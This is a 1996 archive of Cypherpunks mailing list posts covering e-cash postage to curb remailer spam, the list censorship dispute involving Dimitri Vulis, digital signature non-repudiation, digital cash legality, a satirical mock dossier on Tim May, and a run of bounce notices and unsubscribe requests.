From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Wed, 13 Nov 1996 07:33:36 -0800 (PST)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: RE: Remailer Abuse Solutions
Message-ID: <n1364241021.79129@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


Sounds like another attempt to raise the cost of using the Net, nothing more. 

Sure, paying postage (Is $1 really necessary?  Why email when snailmail's 
cheaper??) may reduce general spamming done by local punks, but it does
nothing 
against corporations which already spend millions on snailmail spamming. 
Also, 
what happens when your long-lost friend comes across your addy and tries to 
email you?  Surely you don't want to charge postage for an otherwise free 
service to him/er.  Maintaining a list of "accepted sources" would be a hassle

not many people would accept.

Slight variation is to generate a list of "toll these entities."  A smaller
list 
(hopefully :-), and generally easier because then it defaults to no-bill.  Or,

to accomodate superstars/actors/etc, generate files like rhosts.accept 
rhosts.deny in UNIX.  That way, the user may use either/both types of
filtering.  

Again, the average user wouldn't want to deal with this hassle, everyone's
mail 
software would have to be rewritten, and I basically oppose any ideas that 
cost me money for something I already get for free...  :-)

PM
_______________________________________________________________________________
From: Peter Hendrickson on Wed, Nov 13, 1996 4:10
Subject: Remailer Abuse Solutions
To: cypherpunks@toad.com

What do you do if you are operating a remailer and somebody complains
they are getting spammed?  That's easy, you keep a list of people that
you don't send mail to.  What's hard is if that person wants to receive
other anonymous mail.

The solution is easy: charge e-cash to send mail to certain addresses
and send the money to the owner of the account.  Never put an address
on a kill list, just raise the price of sending mail to it.  This
generates lots of positive publicity for your remailer.  People will
beg to be spammed!

And, since the remailer operator handles the financial parts of the
deal, the technically naive "victim" does not have to have specialized
knowledge or even an e-cash account.

This also eliminates the spam problem generally.  If you are plagued
by spam, create a list of names you will accept mail from.  When a
message comes in that is not on the list, return a message directing
them to send you the mail through a paying remailer.

This solves a problem for famous people, too.  They get lots of
mail but they don't have time to read it all.  How to sort it?  Raise
the price of sending a message.  (I heard that Arnold Schwarzeneggar
was once paid $1 million just to read a script and look at the set
of a movie with no obligation to act in it.)

Okay, now lets go to mailing lists.  We like to read anonymous mail
on this list, but we don't like getting spammed.  It's hard to filter
anonymous mail for obvious reasons.

The solution: don't accept anonymous mail.  Only people on the "approved"
list would be allowed to post.  People who wish to post anonymously
could then send mail through the paying remailer to people on the
"approved" list and request that their message be relayed.  Most people
on the list would be happy to accept a dollar or two to provide this
service.  This would eliminate inappropriate mail while allowing anybody
to post.

For that matter, postings to the list itself could be priced at, say,
a dollar to cut down on the noise levels.

Payments, and addresses which complicate payment, make it harder to
rely on the remailer network.  When you send a message through a
few remailers and make a faux pax on the last one, you won't know
what happened.  Did one of the remailers go down?  Did you make a
mistake?

I think I know a solution to this one, too.  If somebody wants to
get error messages, they include a random 128 bit number with their
message.  This is a different number for each remailer in the chain.
When an error occurs, the remailer distributes an error message
with the number attached.

Error message distribution is pretty easy.  The remailer operator
could publish a web page with the errors.  Or, the messages could
be bundled and made available through anonymous ftp, or mailed to
an error message mailing list, or posted to a newsgroup.

Peter Hendrickson
ph@netcom.com



------------------ RFC822 Header Follows ------------------
Received: by mail.ndhm.gtegsc.com with SMTP;13 Nov 1996 04:10:17 -0400
Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP;
          Wed, 13 Nov 1996 9:06:01 GMT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id RAA13602 for
cypherpunks-outgoing; Tue, 12 Nov 1996 17:07:45 -0800 (PST)
Received: from netcom19.netcom.com (root@netcom19.netcom.com [192.100.81.132])
by toad.com (8.7.5/8.7.3) with SMTP id RAA13594 for <cypherpunks@toad.com>;
Tue, 12 Nov 1996 17:07:36 -0800 (PST)
Received: from [192.0.2.1] (ph@netcom21.netcom.com [192.100.81.135]) by
netcom19.netcom.com (8.6.13/Netcom)
	id RAA03014; Tue, 12 Nov 1996 17:07:31 -0800
X-Sender: ph@netcom15.netcom.com
Message-Id: <v02140b04aeaec9f1fa9b@[192.0.2.1]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 12 Nov 1996 17:07:41 -0800
To: cypherpunks@toad.com
From: ph@netcom.com (Peter Hendrickson)
Subject: Remailer Abuse Solutions
Sender: owner-cypherpunks@toad.com
Precedence: bulk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 13 Nov 1996 10:37:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Catholic University talk; ISP-TV
Message-ID: <Pine.GSO.3.95.961113103635.16150D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 13 Nov 1996 10:35:20 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Unabashed self-promotion

I'm speaking at the Catholic University Law School about online
speech/crypto/copyright issues at 6:30 pm today. Anyone in DC is welcome
to stop by; the talk will be in the Columbus School of Law. 

Also tonight at 8 pm I'll be Brock Meeks' guest on the debut of his ISP-TV
show, "Meeks Unfiltered." We'll be talking about what the U.S. elections
mean to the Net. We plan to argue about universal service as well.
  http://www.digex.net/isptv/

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 13 Nov 1996 10:40:19 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <L8yBXD55w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961113103859.18273A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


If Vulis thinks I did an "excellent job," then perhaps I should have 
criticized him more harshly.

-Declan


On Wed, 13 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Declan's done an excellent journalistic job. I understand that because of the
> space limitations he couldn't quote everything that everyone told him, so one
> small point in his article might be misinterpreted by a casual reader:
> 
> Declan McCullagh <declan@well.com> writes:
> >    though, he's almost notorious. His .sig file, for instance, proudly
> Why "almost"? :-)
> >    points out that he's a former Kook of the Month; Vulis was also a
> There's no such thing as "former" KOTM, Declan. That's a lifetime achievement!
> >    Net-legend and even has the alt.fan.dimitri-vulis newsgroup named
> >    after him.
> (I newgrouped a.f.d-v myself, actually. But it does get traffic :-)
> >    daily messages that came from Vulis's keyboard. The list is on
> >    Gilmore's machine and he can do what he wants with it; he can moderate
> >    the postings, he can censor material, he can shut the whole thing
> >    down. By kicking off an offending user, a list owner merely exercises
> >    his property right. There's no government involvement, so the First
> >    Amendment doesn't apply.
> 
> I told Declan that agree 100% - John Gilmore has the right to do anything
> he likes with his private mailing list. The 1st Amendment does not apply.
> 
> However censorship needn't be government-imposed.
> 
> >        For his part, Gilmore calls removing the Russian mathematician "an
> >    act of leadership." He says: "It said we've all been putting up with
> 
> An act of censorship, an act of cowardice, an act of Hitler-like leadership...
> 
> >    this guy and it's time to stop. You're not welcome here... It seemed
> >    to me that a lot of the posts on cypherpunks were missing the mark.
> >    They seemed to have an idea that their ability to speak through my
> >    machine was guaranteed by the Constitution."
> 
> If John Gilmore ascribes this opinion to me, then he's lying outright.
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 16:14:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <3.0b36.32.19961112135631.00754284@panix.com>
Message-ID: <199611130014.LAA23770@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 16:24:36 -0800 (PST)
To: Peter Hendrickson <cypherpunks@toad.com>
Subject: Returned mail: User Unknown
In-Reply-To: <9611121734.aa17916@salmon.maths.tcd.ie>
Message-ID: <199611130024.LAA23905@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 16:25:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611121917.VAA19844@freenet.hut.fi>
Message-ID: <199611130024.LAA23927@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 16:26:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611101939.LAA13170@netcom4.netcom.com>
Message-ID: <199611130026.LAA23956@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 16:27:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <woJaXD3w165w@bwalk.dm.com>
Message-ID: <199611130027.LAA23975@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 16:36:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <19961112184849116.AAA174@dev.vertexgroup.com>
Message-ID: <199611130036.LAA24120@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 13 Nov 1996 08:43:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Question on non-repudiation
Message-ID: <v0300784daeafaa7128a9@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Wed, 13 Nov 1996 04:11:08 -0500 (EST)
X-Sender: field@pop.pipeline.com
Mime-Version: 1.0
To: John Lowry <jlowry@BBN.COM>
From: "Richard L. Field" <field@pipeline.com>
Subject: RE: Question on non-repudiation
Cc: set-discuss@commerce.net
Sender: owner-set-talk@commerce.NET
Precedence: bulk

+----------------------------------------------------+
Addressed to: set-discuss@commerce.net
+----------------------------------------------------+

   As chair of the ABA's Electronic Commerce Payment Committee and a member
of the drafting team for its Digital Signature Guidelines, I suppose I am
one of the people expected to "solve" the non-repudiation problem through
legal means.

   Notwithstanding any technical or procedural proofs, there is no absolute
non-repudiation, as a legal matter, unless a statute is enacted to that
effect.  For consumers in the U.S., there is no indication that this will
happen.  The applicable laws governing credit cards and the consumer use of
debit cards specify that the customer can repudiate any unauthorized
transaction, and that it is left to his bank/issuer to prove that the
transaction was actually performed by that customer or under his authority.
Even if technical means are used to ensure that the customer will always
retain solitary access control to the account (by biometric means, for
example), he can still claim coercion, error with respect to legal capacity,
etc.  Where software-based keys are used to confirm identity and/or
authority to enter into a transaction, there are additional risks of error
or fraud associated with initially obtaining a key and tying it to an
identity, as well as the ongoing association between the key and the
identity and/or authority.

   In these cases some third party ("trusted" CA, etc.) could step in and
contractually agree to bear all risk of customer repudiation, but given the
relatively low value of the average transaction that would be unlikely.
Additionally, in some countries laws may shift the risk of loss absolutely
to the customer or otherwise prevent him from repudiating a transaction.  To
some degree, this is the direction taken in the U.S. laws governing
commercial wire transfers.  If there are any countries contemplating the
enactment of laws that would absolutely bind a person whenever his private
key has been used, I would be most interested in hearing about them.

   - Richard Field



At 11:35 AM 11/12/96 -0500, you wrote:
>+----------------------------------------------------+
>Addressed to: set-discuss@commerce.net
>+----------------------------------------------------+
>
>Not to be argumentative but non-repudiation can be established
>technically.  The formal definition requires that through technical
>and procedural proofs a party cannot repudiate a transaction.  The
>law may not recognize those techniques and procedures for contractual
>purposes today but the ABA is working on it....

------------------------------------------------------------------------
This message was sent by set-discuss@commerce.net.  For a complete listing
of available commands, please send mail to 'majordomo@commerce.net'
with 'help' (no quotations) contained within the body of your message.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 16:40:54 -0800 (PST)
To: Steven Weller <cypherpunks@toad.com>
Subject: Returned mail: User Unknown
In-Reply-To: <199611121922.MAA18356@infowest.com>
Message-ID: <199611130040.LAA24162@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Wed, 13 Nov 1996 11:52:09 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611131951.LAA16239@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


[This is a rebuttal to a misguided news article.]

> Cypher-Censored
> By Declan McCullagh (declan@well.com)

Thank you for leaving your email address. It makes this easier.

You people (read: the unaware and hypnotized masses, which includes
reporters who's desire for attention and political safety holds them
in line with the consensual illusion) keep missing the real issue, and
substituting issues which only hold themselves in place.

[Those of you who know, please excuse the mediaistic terms used in
this rebuttal. One must use the symbols one is given to communicate
at the level of understanding of those who use them.]

>        Thus began a debate over what the concept of censorship means in a
>    forum devoted to opposing it. Did Gilmore have the right to show Vulis
>    the virtual door? Or should he have let the ad hominem attacks
>    continue, encouraging people to set their filters accordingly? The
>    incident raises deeper questions about how a virtual community can
>    prevent one person from ruining the forum for all and whether only
>    government controls on expression can be called "censorship."

"Cyberspace" is interacted with using tools under the control of the
interactor. 

In person-to-person interaction, one's only real defense against what
one decides to call "unwanted" is to remove oneself from the arena of
interaction. It may not be possible to ignore or run away from certain
sources of input. 

In cyberspace, however, it is not only possible but necessary and even
desirable. Cyberspace allows one to interact with many more people
then can fit in any given physical space. One simply -cannot- receive
input from 2000 people and not employ some sort of filtering
mechanism. Indeed, cyberspace has many buttons and switches (and even
programmatic filters) which allow one to -completely- control whom one
interacts with.

Logically, we must conclude that those who frequently and repeatedly
cry for the censorship or removal of any source of input from
cyberspace are either:

	-quite clueless about the tools at their disposal
	-ideologically or personally opposed to the source of input
or	-in need of large amounts of attention from others

Cluelessness can be overcome by appropriate teaching and interest in
learning (the latter issue we can safely assume users of popular but
ineffectual windowing OSes are not able to overcome). Such
cluelessness, however, is not and should never be a reason for 
censorship.

A need for attention can be overcome by refraining from the denial
that the need exists, followed by careful observation of that need. 
More can be said on this, but this is not the forum. Such a need
is not and should never be a reason for censorship. 

Idelological opposition is another matter entirely. To understand this
better, we'll need to observe this in action. Here is an example:

>        Vulis portrays himself as a victim, but as I posted to the list
>    last week, I disagree. Anyone who's spent any time on the
>    100-plus-messages-a-day list can read for themselves the kind of nasty
>    daily messages that came from Vulis's keyboard. 

"Nasty" is, of course, by this reporter's standard of "nasty". Granted
this standard may in fact be shared by Mr. Gilmore, however a shared
standard is not necessarily an appropriate or correct standard. 

>    The list is on Gilmore's machine and he can do what he wants with
>    it; he can moderate the postings, he can censor material, he can
>    shut the whole thing down. By kicking off an offending user, a
>    list owner merely exercises his property right. There's no
>    government involvement, so the First Amendment doesn't apply. And
>    the deleted, disgruntled user is free to start his own mailing
>    list with different rules.

Notice how, once the opposition is admitted to, the rationalization
begins. Suddenly this is not a matter of censorship, but of ownership.
Just as suddenly, the classic anti-free-speech arguments of "if you
don't like it, start yer own" begin to surface. (Anyone ever notice
how this resembles the "love it or leave it" mentality of certain
American patriotic organizations?)

What would ideological opposition be without the attempt at analogy? 
Here we witness another example:

>        But then the question is whether Gilmore should have exercised
>    that right, especially in such an open forum. Again, I think Gilmore's
>    actions were justified. Consider inviting someone into your home or
>    private club. If your guest is a boor, you might ask him to leave. If
>    your guest is an slobbish drunk of a boor, you have a responsibility
>    to require him to leave before he ruins the evening of others.

Notice that the net is compared to a home or private club. Actually
the net is neither, however that would not serve the purposes of this
analogy, so this fact is convienently forgotton. 

The net is a wonderful place. Any ideology, no matter who disagrees or
agrees with it, can be expressed and discussed here...assuming those
who oppose this ideology do not have their way with the source of
expression. There is a more refined and deeper truth to be found
in the very existence of the set of all human ideologies, which is
just beginning to show itself to some netizens. Unfortunately, this
truth can be ruined when people equate some notion of value to 
sources which ignore all but a tiny subset of the set of all ideologies:

>        Eugene Volokh, a law professor at UCLA, runs a number of mailing
>    lists and has kicked people off to maintain better editorial control.
>    Volokh says that the most valuable publications are those that
>    exercise the highest degree of editorial control.

Value to whom and for what? If the editorial control produces one
small element of the set of all ideologies, then this is only of value
to the people who support this ideology. Given that the set of 
people who support an issue is smaller than the set of people
who support and oppose an issue, would the value not increase
by allowing both sides of an issue equal speaking time? 

>        For his part, Gilmore calls removing the Russian mathematician "an
>    act of leadership." He says: "It said we've all been putting up with
>    this guy and it's time to stop. You're not welcome here... It seemed
>    to me that a lot of the posts on cypherpunks were missing the mark.
>    They seemed to have an idea that their ability to speak through my
>    machine was guaranteed by the Constitution."

It is sad to note that this is the leader of one of America's
forerunning organizations of freedom who says these words. For all
*his* ideology of free speech, this statement reveals the hypocrasy he
lives with for all to see. The true litmus test of free speech is to
encounter speech that you *want* to censor.

Mr. Gilmore, and other like minded parties, might want to consider
what would happen if one parent company owned *all* communications
media. Would they they be so supportive of the ideology of ownership
and communciation they espouse?
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

Truth (n.) - the most deadly weapon ever discovered by humanity. Capable 
of destroying entire perceptual sets, cultures, and realities. Outlawed 
by all governments everywhere. Possession is normally punishable by death.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Wed, 13 Nov 1996 12:08:39 -0800 (PST)
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Exon Countdown Clock and farewell messages
Message-ID: <199611132008.MAA04178@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:59 AM 11/8/96 -0800, Michael Page wrote and Rich Graves forwarded:

>> ...
>> >We would attempt to send it via a Email, but the respected Senator does not
>> >have Email. (The Irony).
>> ...

To Which, on Mon, 11 Nov 1996, I wrote:

>> There is no irony here, Mr. Exon tried to control the internet for the very
>> reason that he didn't understand it and one of his granddaughters did.
>> Perhaps if he did understand the internet then he wouldn't be a threat.
>> Remember, people fear that which they don't understand.
 
To which, at 07:57 PM 11/12/96 -0800, Declan McCullagh wrote:

>I disagree. I think people understand the printing press and still want 
>to control it. Morality police are morality police, no matter what the 
>medium or how well they understand it.

A valid point, and Exon may have had designs of media control the whole
time.  The methods he used and the arguments he stated, however, suggested
to me, that he was someone who did not comprehend the technology.  Those who
he was able to sway with the dossier of .GIF's certainly were ignorant, many
of them were turned by that one display of images.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smith@sctc.com (Rick Smith)
Date: Wed, 13 Nov 1996 10:33:27 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Dossier on Tim May is Easily Obtainable
Message-ID: <v01540b00aeaf9f2dbe5c@[172.17.1.61]>
MIME-Version: 1.0
Content-Type: text/plain


The thorough investigator respects the value of physical records and
interviews with those actually present. Bit rot is a tricky thing, and so
are simple string matches.

At 7:15 PM 11/12/96, Timothy C. May wrote:

>To illustrate, let me call up my BlackNet Dossier Service entry on you.
>www.black.net... I'll just pick _part_ of your entry, from exactly 30 years
>ago:
>[,,,,much stuff about Mr. Smith elided....]
>So, Mr. Smith...is the dossier entry basically correct?

Perhaps that was the Rick Smith in the class behind or before me who is or
is not shown in yearbook photos with that blonde cheerleader. Or perhaps it
was another Rick Smith who does or does not appear in yearbook photographs
in the company of various brunette females. Could it have been the Rick
Smith whose house got struck by lightning in our town a few weeks back? Or
the Rick Smith who just got a building permit? Are these all the same
person? Nope.

On the other hand, a review of physical records from that important era of
the mid 1960s *does* indicate the existence of one and only one young
Timothy Christopher May in the vicinity of Langley, Va.

Interviews with [SOURCE DELETED] indicate that this young Timothy
Christopher May was known for a clever and abrasive style of discourse.
Investigators note that the exact same style of discourse appears in the
postings of one "Tim May" who is associated with that subversive cabal
known as "cypherpunks." The interviews also indicate that young Timothy
Christopher May was observed on numerous occasions to be reading Scientific
American in the school library and didn't always "share." E-mail messages
authored by "Tim May" and intercepted by [SOURCE DELETED] state that he has
read Scientific American on numerous occasions. At this time there is no
evidence as to whether or not "Tim May" willingly shares his magazines with
others, though some investigators argue that it is unlikely.

Records retrieved from [SOURCE DELETED] also show that the young Timothy
Christopher May exploited his interest in physics for destructive purposes,
like elaborate pranks involving fictious weaponry and national security
information. [INFORMATION DELETED FOR NATIONAL SECURITY REASONS -- ORCON
U31 -- OADR FOR RECLASSIFICATION]

However, more careful investigators have uncovered evidence to suggest that
this was not entirely a prank. Records from [SOURCE DELETED] indicate that
the young Timothy Christopher May purchased a huge gap magnet from Edmund
Scientific Company and also produced science fair project titled "Ball
Lightning: A Stable Plasma?" Investigators suspect the timing of these
events is not a coincidence.

Unfortunately, the photographs of young Timothy Christopher May being
escorted out of Earth Science class by agents of the Office of Naval
Intelligence have somehow been tampered with and are difficult to
reconstruct. Perhaps with modern technology...

Hmmm, similarities in name, interests, style of discourse, and a history of
technological subversion. Is this the same individual, thirty years later?
Gentle readers, you decide.

Rick.
smith@sctc.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FWJZ05A@prodigy.com (CLERK PHILLIP G ROBERTS)
Date: Wed, 13 Nov 1996 09:56:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: take me off your mailing list
Message-ID: <199611131712.MAA17944@mime3.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


unsubcribe cypherpunks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FWJZ05A@prodigy.com (CLERK PHILLIP G ROBERTS)
Date: Wed, 13 Nov 1996 09:34:59 -0800 (PST)
Subject: take me off your mailing list
Message-ID: <199611131715.MAA19158@mime3.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


unsubcribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FWJZ05A@prodigy.com (CLERK PHILLIP G ROBERTS)
Date: Wed, 13 Nov 1996 09:36:42 -0800 (PST)
Subject: take me off your mailing list
Message-ID: <199611131715.MAA10830@mime3.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


unsubcribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 13 Nov 1996 04:17:15 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
In-Reply-To: <199611130658.WAA07455@mail.pacifier.com>
Message-ID: <Pine.LNX.3.94.961113121435.596A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Nov 1996, jim bell wrote:

> At 02:11 AM 11/13/96 +0000, The Deviant wrote:
> >On Tue, 12 Nov 1996, jim bell wrote:
> >
> >> At 11:57 PM 11/11/96 -0500, Michael Froomkin - U.Miami School of Law wrote:
> >>  Indeed, if Congress chose to license
> >> >private mints, that would, IMHO be legal.  The point here is that the
> >> >states don't have the power to coin money.
> >> 
> >> But, apparently, during the 1800's states (?) and individual banks did 
> >> indeed print their own currency.
> >> 
> >> The way I see it, a positive statement in the Constitution that the Feds 
> >> have the power to coin money does not necessarily exclude other 
> >> people/banks/states/foreign countries from doing likewise.
> >> 
> >
> >Hrmm.. One might point out that the only thing required for someone to
> >"mint" (and I use this term loosely) money is for popular belief that the
> >money is worth something.  What do you think a cashier's check is?  Other
> >notable versions are (and I'm sure somebody is going to say "but its
> >represintative of the US Dollar", even though its all dealing with money
> >that really isn't there) is AmEx, MasterCard, Visa, etc.
> 
> This is yet another reason the Federal government is going to find it so 
> difficult to ban or regulate digital cash.  With the collective precedents 
> of paper money, then checks, then credit cards, then traveler's checks,  
> then debit cards, and so forth, the addition of yet another medium of 
> exchange doesn't appear to be a really new concept.  
> 
> Also, as far as I understand it, there is nothing illegal about spending (or 
> accepting) foreign money inside the US, and in many if not most countries it 
> is, likewise, not illegal to spend foreign money there as well.    
> Obviously, the precedents allowing digital cash far outweigh those which 
> could be marshalled to prohibit it.\
> 

Yes, the precedents for allowing digital cash do outweigh the ones against
it.  To the letter of the law, digital cash is perfectly legal.  Of
course, so is the Federal Reserve Bank, but... ;)

> 
> Jim Bell
> jimbell@pacifier.com
> 

 --Deviant
Let the machine do the dirty work.
		-- "Elements of Programming Style", Kernighan and Ritchie






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FWJZ05A@prodigy.com (CLERK PHILLIP G ROBERTS)
Date: Wed, 13 Nov 1996 09:33:16 -0800 (PST)
Subject: take me off your mailing list
Message-ID: <199611131716.MAA18090@mime3.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


unsubcribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 17:17:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <Pine.OSF.3.91.961112171211.2337A-100000@InfoNET.st-johns.nf.ca>
Message-ID: <199611130117.MAA24763@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FWJZ05A@prodigy.com (CLERK PHILLIP G ROBERTS)
Date: Wed, 13 Nov 1996 09:38:26 -0800 (PST)
Subject: take me off your mailing list
Message-ID: <199611131717.MAB18050@mime3.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


unsubcribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 17:26:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <3.0.32.19961112152531.00a068b0@rpcp.mit.edu>
Message-ID: <199611130125.MAA24816@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 13 Nov 1996 11:14:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Black markets vs. cryptoanarchy
In-Reply-To: <Pine.SUN.3.95L.961112224755.2462B-100000@bonjour.cc.columbia.edu>
Message-ID: <awecXD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Wise <jw250@columbia.edu> writes:

> On Tue, 12 Nov 1996, Timothy C. May wrote:
> 
> > My piece was written as a rant about the dangers of the proposed talk of
> > "privatizing food distribution points," about how this would result in a
> > system where only the rich could get access to nutritional food, and how
> > the poor would be made to suffer. And how this "caloric anarchy" would
> > result in vicious monopolies, price wars, and deviation from Recommended
> > Governmental Caloric Intake Rules.
> 
> Which it does...  FWIW, I tend to agree with your general point, but I
> moved from downtown Manhattan to Harlem recently, and was surprised to see
